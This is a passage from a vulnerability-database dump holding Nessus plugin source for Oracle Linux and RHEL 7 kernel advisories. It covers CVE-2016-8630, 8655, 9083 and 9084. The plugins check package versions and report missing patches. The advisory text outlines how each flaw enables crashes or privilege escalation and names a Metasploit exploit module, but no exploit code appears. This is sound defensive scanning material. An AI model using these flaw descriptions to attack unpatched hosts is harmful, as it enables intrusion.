attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:0386 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-March/006747.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-0386\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.10\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:07:10", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "RHEL 7 : kernel (RHSA-2017:0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/97509", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0386. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97509);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0386\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2017:0386)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/2940041\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9084\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2017:0386\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0386\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:49:36", "description": "Security Fix(es) :\n\n - Linux kernel built with the Kernel-based Virtual Machine\n (CONFIG_KVM) support is vulnerable to a NULL pointer\n dereference flaw. It could occur on x86 platform, when\n emulating an undefined instruction. An attacker could\n use this flaw to crash the host kernel resulting in DoS.\n (CVE-2016-8630, Important)\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw 